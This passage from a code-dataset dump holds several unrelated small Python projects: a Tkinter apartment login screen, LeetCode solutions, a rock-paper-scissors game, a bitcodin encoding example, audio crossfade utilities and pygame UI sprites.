self.lst2.selectedItems()\n for item in listItems:\n self.lst2.takeItem(self.lst2.row(item))\n self.lst1.addItem(item)\n\n\ndef main():\n app = QApplication(sys.argv)\n trp = (\n \"Apple\",\n \"Bananas\",\n \"Carrot\",\n \"Butter\",\n \"Meat\",\n \"Potato\",\n \"Pineapple\"\n )\n application = MainWindow(trp)\n application.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Adelaide95/laba4.8-PySide2-","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38816295088","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkcalendar\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport random\r\n\r\n\r\nmaster = Tk()\r\nmaster.title('WELCOME TO GRACIOUS APARTMENTS')\r\nsW = master.winfo_screenwidth()\r\nsH = master.winfo_screenheight()\r\naW = sW - 200\r\naH = sH - 100\r\nposx = (sW/2) - (aW/2)\r\nposy = (sH/2) - (aH/2)\r\nmaster.geometry(f'{aW}x{aH}+{int(posx)}+{int(posy)}')\r\nmaster.configure(background=\"#cfe0e8\")\r\n\r\n\r\n\r\ndef expandBlueG():\r\n lbl_Introg.configure(font=(\"arial\",100,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introg.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nLfrm_Gracious = LabelFrame(master, relief=\"groove\", bg=\"#ffcc5c\")\r\nLfrm_Gracious.grid(padx=100,pady=50)\r\nlbl_Introg = Label(Lfrm_Gracious, text=\"G\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introg.grid(row=1, column=3)\r\nlbl_Introg.after(3000, expandBlueG)\r\n\r\n\r\n\r\n#lbl_Intror = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1,column=4)\r\ndef expandBlueR():\r\n lbl_Intror.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intror.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nlbl_Intror = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intror.grid(row=1, column=4)\r\nlbl_Intror.after(4000, expandBlueR)\r\n\r\n#lbl_Introa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=5)\r\ndef expandBlueA():\r\n lbl_Introa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introa.after(5000, shrinkNormal)\r\nlbl_Introa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introa.grid(row=1, column=5)\r\nlbl_Introa.after(5000, expandBlueA)\r\n\r\n#lbl_Introc = Label(frm_Intro, text=\"C\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=6)\r\ndef expandBlueC():\r\n lbl_Introc.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introc.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introc.after(5000, shrinkNormal)\r\nlbl_Introc = Label(Lfrm_Gracious, text=\"C\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introc.grid(row=1, column=6)\r\nlbl_Introc.after(6000, expandBlueC)\r\n\r\n#lbl_Introi = Label(frm_Intro, text=\"I\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=7)\r\ndef expandBlueI():\r\n lbl_Introi.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introi.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introi.after(5000, shrinkNormal)\r\nlbl_Introi = Label(Lfrm_Gracious, text=\"I\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introi.grid(row=1, column=7)\r\nlbl_Introi.after(7000, expandBlueI)\r\n\r\n#lbl_Introo = Label(frm_Intro, text=\"O\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=8)\r\ndef expandBlueO():\r\n lbl_Introo.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introo.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n 
lbl_Introo.after(5000, shrinkNormal)\r\nlbl_Introo = Label(Lfrm_Gracious, text=\"O\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introo.grid(row=1, column=8)\r\nlbl_Introo.after(8000, expandBlueO)\r\n\r\n#lbl_Introu = Label(frm_Intro, text=\"U\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=9)\r\ndef expandBlueU():\r\n lbl_Introu.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introu.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introu.after(5000, shrinkNormal)\r\nlbl_Introu = Label(Lfrm_Gracious, text=\"U\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introu.grid(row=1, column=9)\r\nlbl_Introu.after(9000, expandBlueU)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=10)\r\ndef expandBlueS():\r\n lbl_Intros.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intros.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intros.after(5000, shrinkNormal)\r\nlbl_Intros = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intros.grid(row=1, column=10)\r\nlbl_Intros.after(10000, expandBlueS)\r\n#===================================================apartments======================================================\r\n#lbl_Introap = Label(frm_Intro, text=\"A\", font=(\"times\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=2)\r\ndef expandBlueAP():\r\n lbl_Introap.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introap.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introap.after(4000, shrinkNormal)\r\nlbl_Introap = Label(Lfrm_Gracious, text=\" A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introap.grid(row=1, column=11)\r\nlbl_Introap.after(10000, expandBlueAP)\r\n\r\n#lbl_Introp = Label(frm_Intro, text=\"P\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=3)\r\ndef expandBlueP():\r\n lbl_Introp.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introp.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introp.after(4000, shrinkNormal)\r\nlbl_Introp = Label(Lfrm_Gracious, text=\"P\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introp.grid(row=1, column=12)\r\nlbl_Introp.after(9000, expandBlueP)\r\n\r\n#lbl_Introsa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=4)\r\ndef expandBlueSA():\r\n lbl_Introsa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsa.after(4000, shrinkNormal)\r\nlbl_Introsa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsa.grid(row=1, column=13)\r\nlbl_Introsa.after(8000, expandBlueSA)\r\n\r\n#lbl_Introsr = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=5)\r\ndef expandBlueSR():\r\n lbl_Introsr.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsr.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsr.after(4000, shrinkNormal)\r\nlbl_Introsr = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsr.grid(row=1, column=14)\r\nlbl_Introsr.after(7000, 
expandBlueSR)\r\n\r\n#lbl_Introst = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=6)\r\ndef expandBlueST():\r\n lbl_Introst.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introst.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introst.after(4000, shrinkNormal)\r\nlbl_Introst = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introst.grid(row=1, column=15)\r\nlbl_Introst.after(6000, expandBlueST)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"M\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=7)\r\ndef expandBlueM():\r\n lbl_Introm.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introm.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introm.after(4000, shrinkNormal)\r\nlbl_Introm = Label(Lfrm_Gracious, text=\"M\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introm.grid(row=1, column=16)\r\nlbl_Introm.after(5000, expandBlueM)\r\n\r\n#lbl_Introse = Label(frm_Intro, text=\"E\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=8)\r\ndef expandBlueSE():\r\n lbl_Introse.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introse.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introse.after(4000, shrinkNormal)\r\nlbl_Introse = Label(Lfrm_Gracious, text=\"E\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introse.grid(row=1, column=17)\r\nlbl_Introse.after(4000, expandBlueSE)\r\n\r\n#lbl_Introsn = Label(frm_Intro, text=\"N\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=9)\r\ndef expandBlueSN():\r\n lbl_Introsn.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsn.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsn.after(4000, shrinkNormal)\r\nlbl_Introsn = Label(Lfrm_Gracious, text=\"N\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsn.grid(row=1, column=18)\r\nlbl_Introsn.after(3000, expandBlueSN)\r\n\r\n#lbl_Introsx = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=10)\r\ndef expandBlueSX():\r\n lbl_Introsx.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsx.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsx.after(4000, shrinkNormal)\r\nlbl_Introsx = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsx.grid(row=1, column=19)\r\nlbl_Introsx.after(2000, expandBlueSX)\r\n\r\n#lbl_Intross = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=11)\r\ndef expandBlueSS():\r\n lbl_Intross.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intross.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intross.after(4000, shrinkNormal)\r\nlbl_Intross = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intross.grid(row=1, column=20)\r\nlbl_Intross.after(1000, expandBlueSS)\r\n\r\n\r\n\r\n\r\n\r\nLfrm_Out = LabelFrame(master, text=\"Welcome Grace\",font=(\"arial\",5), relief=\"raised\", borderwidth=5, bg=\"#ffcc5c\",padx=20,pady=20)\r\nLfrm_Out.grid(padx=500, pady=100)\r\nfrm_Mid = Frame(Lfrm_Out, relief=\"raised\", borderwidth=5, 
bg=\"#cfe0e8\",padx=10,pady=10)\r\nfrm_Mid.grid()\r\nLfrm_In = LabelFrame(frm_Mid, bg=\"#ffcc5c\")\r\nLfrm_In.grid()\r\n\r\nlbl_User = Label(Lfrm_In, text=\"User_Name: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_User.grid(row=0, column=0, columnspan=2, padx=10, pady=20)\r\nlbl_Pass = Label(Lfrm_In, text=\"Pass_Word: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_Pass.grid(row=1, column=0, columnspan=2, padx=10, pady=20)\r\n\r\nUser_Name = StringVar()\r\netr_User = Entry(Lfrm_In, textvariable=User_Name, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\netr_User.grid(row=0, column=2, columnspan=2, padx=10, pady=20)\r\nPass_Word = StringVar()\r\netr_Pass = Entry(Lfrm_In, textvariable=Pass_Word, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"), show='*')\r\netr_Pass.grid(row=1, column=2, columnspan=2, padx=10, pady=20)\r\n\r\ndef Validate():\r\n if User_Name.get()=='' or Pass_Word.get()=='':\r\n messagebox.showerror('Empty Fields','User Name and Password Must Be Filled')\r\n else:\r\n conn = sqlite3.connect('User_Data')\r\n cur = conn.cursor()\r\n cur.execute(\"SELECT * FROM user\")\r\n a = cur.fetchall()\r\n #print(a)\r\n cur.execute(\"SELECT * FROM user WHERE user_id=? AND password=?\",(User_Name.get(), Pass_Word.get()))\r\n c= cur.fetchall()\r\n if c:\r\n print('Login Successful')\r\n else:\r\n print('Login Failed!!')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\nbtn_Login = Button(frm_Mid, text=\"Log In\", background=\"#588c7e\", fg=\"#ff6f69\", activebackground=\"#ff6f69\", activeforeground=\"#588c7e\", font=(\"arial\",15,\"bold\"), command=Validate)\r\nbtn_Login.grid(padx=2, pady=4)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmainloop()","repo_name":"TekJoker/Python_Project_Water_BIlls","sub_path":"ProjoZ_002_LogIn.py","file_name":"ProjoZ_002_LogIn.py","file_ext":"py","file_size_in_byte":11632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25198293932","text":"from collections import defaultdict\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n\n freq1, freq2 = defaultdict(int), defaultdict(int)\n res = []\n for num in nums1:\n freq1[num] += 1\n for num in nums2:\n freq2[num] += 1\n for num in freq1.keys():\n if num in freq2:\n freq = min(freq1[num], freq2[num])\n for _ in range(freq):\n res.append(num)\n return res\n","repo_name":"Reflectrr/leetcode","sub_path":"350.intersection_of_two_arrays_ii.py","file_name":"350.intersection_of_two_arrays_ii.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36249585854","text":"import random\n\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\ndef check_win(player, computer):\n print (f\"You chose {player} and computer chose {computer}.\")\n if player == computer:\n return \"It's a tie\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors! You Win. Congratulations!\"\n else:\n return \"Paper covers the rock! Unfortunately, computer wins this time.\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts the paper! Unfortunately, computer wins this time.\"\n else:\n return \"Paper covers the rock! You Win. Congratulations!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors! Unfortunately, computer wins this time.\"\n else:\n return \"Scissors cuts the paper! You Win. Congratulations!\"\n\nchoices = get_choices()\nresult = check_win(choices[\"player\"], choices[\"computer\"])\nprint(result)\n\n","repo_name":"harsha-bhojaiah/Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6458112925","text":"from .abstract_favicon_group import AbstractFaviconGroup\n\nBROWSER_TARGET_SIZES = [(16, 16), (32, 32), (48, 48)]\n\n\nclass FaviconGroupStandard(AbstractFaviconGroup):\n def __init__(self, conf, outdir):\n super().__init__(conf, outdir)\n self.sizes = BROWSER_TARGET_SIZES\n self.filename_schema = 'favicon-{}x{}.png'\n\n def generate_images(self, favicon):\n self.generate_image(favicon, image_format='ICO',\n filename='favicon.ico')\n super().generate_images(favicon)\n","repo_name":"maxdup/flask-favicon","sub_path":"flask_favicon/groups/favicon_standard.py","file_name":"favicon_standard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17763010133","text":"#!/usr/bin/env python\n__author__ = 'David Moser - david.moser@bitmovin.net'\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://url.to.video.with.closed.captions')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [\n bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000),\n bitcodin.AudioStreamConfig(default_stream_id=1, bitrate=192000)\n]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile Closed Captions', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\naudio_meta_data = [\n bitcodin.AudioMetaData(0, 'Spanish', 'es'),\n bitcodin.AudioMetaData(1, 'English', 'en')\n]\n\nvideo_meta_data = [\n bitcodin.VideoMetaData(0, 'Spanish', 'es')\n]\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests,\n speed='standard',\n extract_closed_captions=True,\n audio_meta_data=audio_meta_data,\n video_meta_data=video_meta_data\n)\n\njob_result = bitcodin.create_job(job)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_job_closed_captions_multiple_audio_streams.py","file_name":"create_job_closed_captions_multiple_audio_streams.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
+{"seq_id":"15078699485","text":"def time_stretch(audio, factor, sample_rate=44100):\n import pyrubberband as pyrb\n return pyrb.time_stretch(audio, sample_rate, factor)\n\n\ndef load_audio(filepath):\n # returns loaded mono audio.\n from essentia.standard import MonoLoader\n return MonoLoader(filename=filepath)()\n\n\ndef save_audio(audio, filename, file_format='wav', bit_rate=320):\n from essentia.standard import MonoWriter\n MonoWriter(filename=filename, bitrate=bit_rate, format=file_format)(audio)\n\n\ndef does_annotations_folder_exist(folder_name='pycrossfade_annotations'):\n from os.path import isdir\n return isdir(folder_name)\n\n\ndef create_annotations_folder(folder_name='pycrossfade_annotations'):\n from os import mkdir\n if not does_annotations_folder_exist(folder_name):\n mkdir(folder_name)\n return True\n return False\n\n\ndef path_to_annotation_file(annt_folder_name, file_name, file_format='txt'):\n from os.path import join\n return join(annt_folder_name, file_name + '.' + file_format) \n\n\ndef linear_fade_volume(audio, start_volume=0.0, end_volume=1.0):\n import numpy as np\n\n if start_volume == end_volume:\n return audio\n\n length = audio.size\n profile = np.sqrt(np.linspace(start_volume, end_volume, length))\n return audio * profile\n\n\ndef linear_fade_filter(audio, filter_type, start_volume=0.0, end_volume=1.0):\n from yodel.filter import Biquad\n import numpy as np\n from scipy.signal import lfilter\n\n if start_volume == end_volume:\n return audio\n\n SAMPLE_RATE = 44100\n LOW_CUTOFF = 70\n MID_CENTER = 1000\n HIGH_CUTOFF = 13000\n Q = 1.0 / np.sqrt(2)\n NUM_STEPS = 20 if start_volume != end_volume else 1\n\n bquad_filter = Biquad()\n length = audio.size # Assumes mono audio\n\n profile = np.linspace(start_volume, end_volume, NUM_STEPS)\n output_audio = np.zeros(audio.shape)\n\n for i in range(NUM_STEPS):\n start_idx = int((i / float(NUM_STEPS)) * length)\n end_idx = int(((i + 1) / float(NUM_STEPS)) * length)\n if filter_type == 'low_shelf':\n bquad_filter.low_shelf(SAMPLE_RATE, LOW_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n elif filter_type == 'high_shelf':\n bquad_filter.high_shelf(SAMPLE_RATE, HIGH_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n else:\n raise Exception('Unknown filter type: ' + filter_type)\n # ~ bquad_filter.process(audio[start_idx : end_idx], output_audio[start_idx : end_idx]) # This was too slow, code beneath is faster!\n b = bquad_filter._b_coeffs\n a = bquad_filter._a_coeffs\n a[\n 0] = 1.0 # Normalizing the coefficients is already done in the yodel object, but a[0] is never reset to 1.0 after division!\n output_audio[start_idx: end_idx] = lfilter(b, a, audio[start_idx: end_idx]).astype('float32')\n\n return output_audio","repo_name":"oguzhan-yilmaz/pyCrossfade","sub_path":"pycrossfade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"}
+{"seq_id":"39162893624","text":"from typing import List\n\n\nclass MajorityChecker:\n\n def __init__(self, arr: List[int]):\n self.t = dict(list)\n for j in range(len(arr)):\n self.t[arr[j]].append(j) # 按顺序遍历数组,每个元素的下标数组就自然是有序,可以直接二分\n self.arr = arr\n\n def query(self, left: int, right: int, threshold: int) -> int:\n print(self.arr)\n\n\nif __name__ == '__main__':\n z = [1, 1, 2, 2, 1, 1]\n obj = MajorityChecker(z)\n print(obj.query(0, 5, 4))\n\n# Your MajorityChecker object will be instantiated and called as such:\n# obj = MajorityChecker(arr)\n# param_1 = obj.query(left,right,threshold)\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14285539534","text":"import pygame\nfrom pygame.sprite import Sprite\nimport string\n\nclass Sidebar(Sprite):\n def __init__(self, screen, contents, bckgrd, pos, horizontal):\n self.screen = screen\n self.contents = contents\n self.image = pygame.image.load(bckgrd)\n self.image_w, self.image_h = self.image.get_size()\n self.pos = pos\n self.horizontal = horizontal # True == Horizontal, False == Vertical\n self.direction = 0 # Initial direction (Going on/off first)\n self.speed = 0.1\n self.move = False\n #self.set_contents()\n\n def scroll_LU(self):\n self.move = True\n self.direction = -1\n\n def scroll_RD(self):\n self.move = True\n self.direction = 1 \n\n def set_contents(self):\n TOP = self.pos[1] - (self.image_h/2)\n BOTTOM = self.pos[1] + (self.image_h/2)\n LEFT = self.pos[0] + (self.image_w/2)\n RIGHT = self.pos[0] + (self.image_w/2)\n for i in range(len(self.contents)):\n if(self.layout[i] == \"TOP\"):\n self.contents[i].pos = (self.pos[0], TOP + (self.contents[i].image_h/2))\n \n def update(self, interact):\n time_passed = interact[8]\n mouse_pos = interact[7]\n click = interact[0]\n # if bar is moving\n if(self.move):\n x_diff = 0\n y_diff = 0\n\n inner_rect = self.screen.get_rect().inflate(-self.image_w,-self.image_h)\n outer_rect = self.screen.get_rect().inflate(self.image_w, self.image_h)\n\n if(self.horizontal):\n new_pos = (self.pos[0] + (time_passed * self.speed * self.direction), self.pos[1])\n x_diff = self.pos[0] - new_pos[0]\n if((new_pos[0] < inner_rect.left)and(new_pos[0] > outer_rect.left)):\n pass\n elif((new_pos[0] > inner_rect.right)and(new_pos[0] < outer_rect.right)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n x_diff = 0\n else:\n new_pos = (self.pos[0], self.pos[1] + (time_passed * self.speed * self.direction))\n y_diff = self.pos[1] - new_pos[1]\n if((new_pos[1] < inner_rect.top)and(new_pos[1] > outer_rect.top)):\n pass\n elif((new_pos[1] > inner_rect.bottom)and(new_pos[1] < outer_rect.bottom)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n y_diff = 0\n\n self.pos = new_pos\n for c in self.contents:\n c.pos = (c.pos[0] - x_diff, c.pos[1] - y_diff)\n c.update(interact)\n else:\n for c in self.contents:\n c.update(interact)\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image,draw_pos)\n\n for c in self.contents:\n c.blitme()\n\nclass Acc_Bar(Sprite):\n\n def __init__(self, screen, pos, owner):\n self.screen = screen\n self.pos = pos\n self.owner = owner\n self.font = pygame.font.Font(None, 40)\n self.font2 = pygame.font.Font(None, 60)\n\n def update(self, interact):\n pass\n\n def blitme(self):\n back = pygame.Surface((300, 150))\n back.fill(self.owner.color)\n back.set_alpha(90)\n draw_pos = (self.pos[0] - 150, self.pos[1] - 75)\n self.screen.blit(back, draw_pos)\n\n if(self.owner.alias != None):\n t_pos = (self.pos[0]-145, self.pos[1] - 75)\n if(self.owner.color[0]+self.owner.color[1]+self.owner.color[2] < 25):\n self.screen.blit(self.font2.render(self.owner.alias, True, self.owner.inv_col), t_pos)\n else:\n self.screen.blit(self.font2.render(self.owner.alias, True, (0,0,0)), t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] - 25)\n self.screen.blit(self.font.render(str(self.owner.record), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] + 25)\n self.screen.blit(self.font.render(str(self.owner.XP), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0] - 50, self.pos[1] + 25)\n self.owner.dog_tag.display(self.screen, t_pos) \n 
\n\n\nclass Button(Sprite):\n\n def __init__(self, screen, images, pos, event, param):\n self.screen = screen\n self.pos = pos\n self.image_base = pygame.image.load(images[0])\n self.image_hover = pygame.image.load(images[1])\n self.image = self.image_base\n self.image_w, self.image_h = self.image.get_size()\n self.event = event\n self.param = param\n self.clicked = False\n self.ready = False\n\n def do(self):\n if(self.param == None):\n self.event()\n else:\n self.event(self.param)\n\n def hover(self, position):\n if((self.pos[0] - (self.image_w/2) < position[0])and\n (self.pos[0] + (self.image_w/2) > position[0])):\n if((self.pos[1] - (self.image_h/2) < position[1])and\n (self.pos[1] + (self.image_h/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n if(self.clicked == False):\n if(self.hover(mouse_pos)):\n self.image = self.image_hover\n if(click):\n if(self.ready):\n self.clicked = True\n self.do()\n else:\n self.ready = True\n else:\n self.image = self.image_base\n self.ready = False\n else:\n if((self.hover(mouse_pos) == False)or(click == False)):\n self.clicked = False\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\n\nclass DummyBlob(Sprite):\n\n def __init__(self, screen, image, pos):\n self.screen = screen\n self.pos = pos\n self.image = pygame.image.load(image)\n self.image_w, self.image_h = self.image.get_size()\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n 